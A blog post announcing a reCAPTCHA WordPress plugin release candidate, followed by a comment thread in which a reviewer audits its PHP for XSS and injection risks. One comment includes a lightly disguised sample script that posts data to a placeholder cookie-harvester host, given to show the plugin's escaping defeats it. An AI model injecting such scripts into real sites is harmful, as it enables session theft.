reCAPTCHA WordPress Plugin 2.8 Release Candidate 2

Alright, after a few suggestions, I have fixed up the plugin. I’ve added options to enable SSL, to be compliant with XHTML 1.0 Strict, to change the theme of the reCAPTCHA on the registration form, and to hide the reCAPTCHA on comment posts (in case you only want it to show on the registration form and only allow registered users to comment). I’ve also fixed a few bugs and slightly redesigned the options page, separating some options so that users have an easier time understanding the context of each one. Here is what it looks like now:

[Image: New Settings Page]

You can download the reCAPTCHA WordPress Plugin version 2.8 Release Candidate 2 here.

13 Responses to “reCAPTCHA WordPress Plugin 2.8 Release Candidate 2”


  1. Hi. Thanks for the update; I tried out the new release candidate as you suggested.

    If you make the usage of api-secure a checkbox, that’ll turn it on or off globally, which breaks when only some of the pages are protected — i.e., the login and registration (everything under wp-admin) but not the blog posts and comment pages, which is how I have mine set up.

    Auto-detecting whether we need to use api-secure or api (like my patch did) should work reliably in every case I can think of. Why require an option if we can make it Just Work™? It’s pretty straightforward and reliable, really.
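A minimal sketch of the auto-detection idea, assuming the request's scheme can be read from `$_SERVER['HTTPS']`. The function name `recaptcha_pick_api_server` is hypothetical, and the two server URLs are assumptions based on the "api" and "api-secure" names used above; this is not the patch itself. Newer WordPress versions also provide `is_ssl()`, which could replace the manual check.

```php
<?php
// Hypothetical helper: the function name and the two server URLs are
// assumptions for illustration, not taken from the plugin's source.
function recaptcha_pick_api_server(array $server)
{
    // PHP sets $_SERVER['HTTPS'] to a non-empty value on HTTPS requests;
    // some servers (notably IIS) set it to "off" for plain HTTP.
    $https = isset($server['HTTPS']) ? strtolower((string) $server['HTTPS']) : '';
    $is_ssl = ($https !== '' && $https !== 'off');

    return $is_ssl
        ? 'https://api-secure.recaptcha.net'
        : 'http://api.recaptcha.net';
}

// Decide per request, so a site that mixes HTTP and HTTPS pages needs no option.
echo recaptcha_pick_api_server($_SERVER), "\n";
```

Because the choice is made on every request, the protected login and registration pages and the unprotected comment pages each get the matching server without a global checkbox.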

    One blocker: There’s a typo in the embedded stylesheet, after the closing tag that puts a semicolon at the top of every page when the plugin’s enabled. End of line 45 of recaptcha.php, you don’t want a semicolon there. View source on the resulting page (or heck, just look at the top line, which now consists of a lonely semicolon) and you’ll see why.

    Thanks for working on this. reCaptcha is the best CAPTCHA I’ve used anywhere, and, given recent research, almost the only unbroken one left. It’s great to be able to just plug it in and have it work.

  2. Thanks, I just realized what you mean about only some things being protected. It seems like your patch only edits the recaptcha plugin file, which is a good thing since we don’t want to use server globals in the library. I will implement your method instead.

    Thanks for the heads up. Someone on the WordPress forums told me about the semicolon; I’ve fixed it.

    EDIT: I’ve fixed those two problems. I’ve uploaded it and you can download Release Candidate 3 here. Please try it out and let me know if it works with the whole SSL thing; I implemented your fix (I hope I didn’t miss anything).

    Also, thanks for the feedback; it’s very much appreciated and I’m glad you like it. I share your views on reCAPTCHA, so my goal is to perfect the plugin. Thanks again, I really appreciate your help, Myoukochou!

  3. You’re more than welcome.

    Tested RC3; it’s good. All the bits I’m using (as in, not mailhide), work fine. Thanks!

    As for the concerns expressed on the group about Mailhide and XSS — I do know what I’m doing in that area, but it’s too early in the morning for me to look for XSS vulns. I haven’t had breakfast yet, so auditing PHP regexps is a rude awakening. :)

    Check the regexps in mh_insert_email. You should be whitelisting known valid characters, never blacklisting potentially-troublesome ones (there are too many, and too much potential for havoc), so the [^@"]+ atoms may need swapping for ones that match only (broadly) [a-z0-9-_.+] and stop at anything else. Get the idea? Watch that user input like a hawk.

    \w varies according to locale, so you might want to steer clear of it.

    RFC 2822-compliant email addresses can include angle brackets, apostrophes, and ampersands in the local-part, but you don’t want them to. Now, \w shouldn’t match those characters, but “shouldn’t” and “\w” occasionally disagree, and if they do, it turns out to be a hellish bug to track down because, for example, it might depend on an Arabic or kanji locale, where \w might well include high Unicode.

    Whether anything might be exploitable practically I’m not sure. Anything malicious you inserted would be AES-encrypted in the mailhide URL, thus mangled beyond “usefulness” on the page itself; if mailhide.recaptcha.net is suitably cautious about not returning troublesome characters, it wouldn’t present a problem in practice.

    Plus, it’s popping up to another domain; even if you did insert a script into the output, what are you going to do there? Steal the clicker’s mailhide.recaptcha.net cookie? That’s… not a whole lot of use. A lot of XSS vulnerabilities are useless to an attacker in practice. Security researchers tend to just stop after inserting a script alert, rather than look at how they can leverage the arbitrary code to do something interesting. If there’s one there, it might be a pretty dull one.

    However, like I said, I just got up. I don’t trust myself to do a PHP security audit before my first cup of tea. :) I’m simply keeping mailhide off for now.

  4. Blaenk Denum wrote:

    Whether anything might be exploitable practically I’m not sure. Anything malicious you inserted would be AES-encrypted in the mailhide URL, thus mangled beyond “usefulness” on the page itself; if mailhide.recaptcha.net is suitably cautious about not returning troublesome characters, it wouldn’t present a problem in practice.

    Very true, I can’t believe I didn’t realize that!

    Alright, take your time, man; you don’t know how much I appreciate your feedback and support! Thanks for the explanation of the regular expressions. I will try to look into it based on what you said, but honestly I’m sure you’re far better than me at this, so I would trust you more with it if you don’t mind (after you’ve had your cup of tea, or in fact whenever you like :P ). I always give credit where credit’s due, so it won’t be in vain!

    Thanks again, Myoukochou, I really appreciate your support!

  5. Here is RC4.

  6. Release Candidate 4 works fine.

    I’ve done a little security stuff here and there, yeah… and don’t worry about credit. I’m just in it to get a working, spammer-resistant CAPTCHA for my new blog; I gave up caring about credit for bugfixing over a decade ago. :)

    The default functions seem to be secure, but I’m reluctant to say that about Mailhide for the moment.

    reCaptcha-2.8-RC4 has, however, survived my (patent-pending) One-Kit-Kat Security Audit™ intact, albeit with recommendations. ;)

    Just throwing
    [noh_de]l33t.xss.k1dd13@{script}var x=window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject('MSXML2.XMLHTTP.3.0');x.open('POST','http://malware.example.com/have_you_ever_been_to_a_session_cookie_harvester_before.php',true);{/script}haha.lolpwned.com[/noh_de] (neutered for safety - imagine curly brackets as angle brackets) at it will not work; htmlentities will eat the angle brackets. That’s all that’s between you and XSS, but it’s enough… but at least one modification would be advisable.

    (Yes, that is what real XSS attacks tend to look like. Only, in the wild, with more l33t, more .cn or .info, and less example.com.)

    I’ve given the rest of the code a bit of a once-over, and I would make the following observations:


    First off, there’s PHP’s very own unguarded rocket-powered chainsaw - a preg_replace ‘e’ - in there (recaptcha.php, line 373). Oh my.

    Is there a particular reason you didn’t just use the PHP function rawurlencode() instead of that? (i.e., am I missing something, for example, regarding UTF-8 extended characters in comments that wouldn’t come back right if you used rawurlencode()?)

    In this particular case, with the particular pattern there, you appear to have got away with the preg_replace ‘e’. Phew. I’d recommend replacing it with something safer anyway, if you possibly can. (preg_replace_callback is actually faster, not to mention safer, because it doesn’t have to generate fresh code on every match.)

    Please be extremely careful with those things; they’re very slow, and they execute code directly including matched fields interpolated from user-supplied data - so they’re incredibly dangerous, and in most cases the worst way of doing a particular task.

    I can’t help but think that whoever was responsible for preg_replace ‘e’ probably laughs maniacally every time a new PHP injection flaw is published, before quaffing a pint of virgin blood to refresh themselves before sitting down on their throne of evil to play the pipe organ in menacing minor chords while stroking their fluffy white cat. (Mroo~w.)

    Ahem.
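A hedged sketch of what swapping the ‘e’ modifier for preg_replace_callback could look like. The function name `escape_for_js` and the pattern are hypothetical stand-ins, since the actual expression on line 373 is not shown here. (The ‘e’ modifier was later deprecated in PHP 5.5 and removed in PHP 7.0, so a callback is the only option on current PHP.)

```php
<?php
// Hypothetical stand-in for the plugin's escaping code: the function name
// and the pattern are assumptions, not the plugin's actual line 373.
function escape_for_js($text)
{
    // Match every byte outside the unreserved ASCII set (no /u modifier,
    // so multi-byte UTF-8 characters are handled one byte at a time).
    return preg_replace_callback(
        '/[^A-Za-z0-9_.~\-]/',
        function ($m) {
            // Always emit two hex digits, so a tab becomes %09 rather than %9.
            return sprintf('%%%02X', ord($m[0]));
        },
        $text
    );
}

echo escape_for_js("it's a\ttest"), "\n"; // it%27s%20a%09test
```

The matched text reaches the callback as ordinary data in `$m`, so nothing from the user's comment is ever compiled as PHP code.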


    Secondly: I’d prefer a tighter email matching regexp; as I said - I generally recommend using positive matches, not negative ones. In these particular cases, it gets passed to mh_replace_hyperlink or mh_replace, and recaptcha_mailhide_url or recaptcha_mailhide_html eats it and spits it out as encrypted base64.

    The trouble with negative matches is that you can put literally anything but what you’re expecting in there, and it’ll eat it right up. Anything. HTML entities, partial HTML entities, single quotes, double quotes, angle brackets, parentheses, at-signs, semicolons… all the way up to exotic overlong UTF-8 sequences that sane parsers should reject out of hand, but frequently don’t.

    Thought experiment: Ever seen an email address that doesn’t match this?
    /([a-z0-9-_.+]+@[a-z0-9][a-z0-9-_.]{0,253}[a-z0-9]\.[a-z]{2,6})/i
    (…other than bang paths; but no-one in 2008 is going to spam a bang path.)

    Note in particular: I’m not saying what tokens end the match, I’m saying what tokens continue it, so that we know what we’re getting doesn’t have any funny business piggy-backing onto it. Paranoid? Well, yes.

    That doesn’t address whether you can do anything malicious by messing around with these, of course. Depending on the code path, it might be perfectly OK.
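To make the positive-versus-negative distinction concrete, here is a small sketch. The positive pattern is the one given above, with the hyphens escaped so they cannot be read as ranges. The negative pattern is a hypothetical stand-in for a `[^@"]+`-style match, not the plugin's real expression, and both sample strings are invented.

```php
<?php
// $positive: the whitelist pattern from the comment, hyphens escaped.
// $negative: a hypothetical blacklist-style pattern for comparison only.
$positive = '/[a-z0-9\-_.+]+@[a-z0-9][a-z0-9\-_.]{0,253}[a-z0-9]\.[a-z]{2,6}/i';
$negative = '/[^@"\s]+@[^@"\s]+/';

$ordinary = 'Contact jane.doe+blog@mail.example.org today';
$hostile  = '<script>alert(1)</script>@example.com';

// The positive pattern finds the ordinary address.
preg_match($positive, $ordinary, $m);
echo $m[0], "\n"; // jane.doe+blog@mail.example.org

// The negative pattern swallows the markup in front of the @ ...
preg_match($negative, $hostile, $m);
echo $m[0], "\n"; // <script>alert(1)</script>@example.com

// ... while the positive pattern finds nothing it is willing to accept.
var_dump(preg_match($positive, $hostile)); // int(0)
```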


    Which brings me to the final point:

    Most of your XSS defense is htmlentities(). Fine, you’d think… but of course, this is PHP, it can’t be that easy - so as usual, there’s a hidden gotcha.

    htmlentities doesn’t encode single quotes. You want htmlentities($input_string,ENT_QUOTES) to get single quotes as well. You probably want to be using that pretty much everywhere you’re using htmlentities now, unless you have a specific reason you need the single quotes as-is. In recaptchalib.php, as well.

    Experiment with that, because I think that’s the only possible practical problem in there, unless mailhide.recaptcha.net has some bizarre HTML injection flaw (and that’s not really within our scope).
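A quick way to see the difference, with the flags passed explicitly. ENT_COMPAT was the default at the time of writing; PHP 8.1 later changed the default to include ENT_QUOTES, so older code that relies on the default behaves as described above only on earlier versions. The sample string is made up.

```php
<?php
$input = "it's \"quoted\" <b>";

// ENT_COMPAT (the default before PHP 8.1) leaves single quotes alone.
echo htmlentities($input, ENT_COMPAT, 'UTF-8'), "\n";
// it's &quot;quoted&quot; &lt;b&gt;

// ENT_QUOTES encodes single quotes as well.
echo htmlentities($input, ENT_QUOTES, 'UTF-8'), "\n";
// it&#039;s &quot;quoted&quot; &lt;b&gt;
```

The unencoded single quote only matters where the output lands inside a single-quoted HTML attribute or JavaScript string, which is why passing ENT_QUOTES everywhere is the safer habit.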

  7. Haha. Wow thanks for the very thorough response, I really appreciate it.

    Blaenk Denum wrote:

    First off, there’s PHP’s very own unguarded rocket-powered chainsaw - a preg_replace ‘e’ - in there (recaptcha.php, line 373). Oh my.

    Is there a particular reason you didn’t just use the PHP function rawurlencode() instead of that? (i.e., am I missing something, for example, regarding UTF-8 extended characters in comments that wouldn’t come back right if you used rawurlencode()?)

    I’m actually the new developer for this plugin. For versions prior to the one I’m working on there were other authors (there still are; they just haven’t worked on it in the longest time). That was one of the pieces that I didn’t write. So you think I should just do:

    var _recaptcha_wordpress_savedcomment = rawurlencode($comment->comment_content);

    Or do you mean I should use a preg_replace_callback and make it so that when that pattern is met, do a rawurlencode on the entire match?

    You would like me to use that email regex instead?

    /([a-z0-9-_.+]+@[a-z0-9][a-z0-9-_.]{0,253}[a-z0-9]\.[a-z]{2,6})/i

    I used to have a huge one but it seemed like overkill:


    /[a-z0-9!#$%&'*+\/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+\/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i

    The reason I’m using negative lookaheads and lookbehinds is that I needed a way to get only matches that weren’t within nohide tags, if that’s what you’re referring to. It took forever to get the regular expressions correct. But if you have ones you would like me to use instead, I’m all for it :D

    I replaced all my calls to htmlentities and included the ENT_QUOTES argument. This was only in recaptcha_mailhide_html in recaptchalib.php and mh_replace_hyperlink in recaptcha.php.

  8. Myoukochou, seeing as how you are apparently way more knowledgeable than me in this area, I am wondering if you could please help me out and do the changes yourself and then paste the result(s) or something. Of course this can be whenever you have time, there’s no pressure at all. From what you mentioned it seems like they are minor changes, but I would rather be safe than sorry (This is a popular plugin and I wouldn’t want many sites at risk for a stupid mistake, although you already mentioned it is relatively safe). If you have any questions as to the understanding of the code, please ask me and I will explain it to you. If you would rather communicate through email, hit me up at jorg@gmail.com

    I would really appreciate this. Right now I’m nearing the end of the school year and I have many projects and tests to work on, some of them due tomorrow, so I will not have time to work on it today. In fact I should begin working on my Architecture projects right now. Again, Myoukochou, I would really appreciate any help you could provide, and I already greatly appreciate the help you have provided so far.

    By the way, my response above might seem brief compared to your thorough response, making you think it was in vain. But I actually did read it all, and again I appreciate the thorough response, it’s just that I don’t have time to work on it right now like I already mentioned, and some things you mentioned are honestly too advanced for me.

    Thanks again Myoukochou.

  9. Ah. I didn’t realise you’re a student. Go do tests, they’re more important — trust me. :)

    None of it really represents a problem. For safety’s sake, put the ENT_QUOTES in; and yes, those are the only occurrences (lines 287-288, recaptchalib.php, and line 201, recaptcha.php).

    Not to mention that given the context of the call, all you’d be worried about is being able to inject stuff into your own comment reply page when failing a captcha. Not normally a big deal.

    Those were mainly recommendations for the future, though. :)

    Characters in the range U+0000..U+000F might also be incorrectly converted to %0-%F by that code, by the way, which Javascript’s unescape() doesn’t seem to want to know. I’ll try rawurlencode() as that appears to do the right thing, but needs testing with a bit of extended UTF-8.

    In other news, I have an inexplicable craving for corned beef hash, and I don’t know why.

  10. Not a security issue but an actual bug, and one I’m not sure how to fix easily:

    Looks like rawurlencode’s behaviour is undefined if fed UTF-8. Big yay for the web development language that doesn’t actually support UTF-8 until PHP 6. :)

    Also looks like IE’s Javascript parser detests newlines and tabs in strings. (Mozilla’s doesn’t mind.) UTF-8 is also apparently a problem in some cases there.

    From a user perspective, looks like if you have something like a tab or some high-ascii (for example, 冥胡蝶) in your comment, if you get the captcha wrong, you might not get your comment back when it reloads the page because the… javascript unescape function chokes on the UTF-8?

    But if you encode the utf-8 bytes, javascript will insert them as characters. I’m not sure there’s any winning this one. Grr.

    Just make those ENT_QUOTES insertions, and I’ll stick a fork in it and call it done for now. :)
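For reference, a small check of what rawurlencode() emits for a tab and for UTF-8 input, assuming the comment text is already a UTF-8 byte string. As far as I can tell, the function works byte by byte, so each byte of a multi-byte character comes out as its own %XX escape. Whether the browser restores the right characters then depends on the decoder: JavaScript's unescape() treats each %XX as a single Latin-1 character, while decodeURIComponent() decodes the escapes as UTF-8. The sample string is invented.

```php
<?php
// "\xC3\xA9" is the UTF-8 encoding of U+00E9 (é), written as raw bytes so
// the example does not depend on the encoding of this source file.
$comment = "caf\xC3\xA9\tok";

echo rawurlencode($comment), "\n"; // caf%C3%A9%09ok
```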

  11. The rawurlencode and UTF-8 problem is known, which was why I changed it to use a preg_replace instead.

    I’ve already done the ENT_QUOTES fix. One guy at the WordPress Forums is claiming that people are still able to sign up at his blog without even having to fill in the CAPTCHA field. This is really weird, especially since it hasn’t happened to me in my own tests and I haven’t heard anyone else complaining about it. Can you test it yourself on your install and see if the same thing happens? Based on the screenshots he provided, it could be that he enabled XHTML compliance and has Javascript disabled in his browser, but I am not entirely sure.

  12. *nods* In that case, I understand; that particular preg_replace is OK, definitely fine to go live, like you have. :)

  13. Thanks for all the help Myoukochou, I really appreciate it! If you ever need or want me to do something to the plugin just let me know!
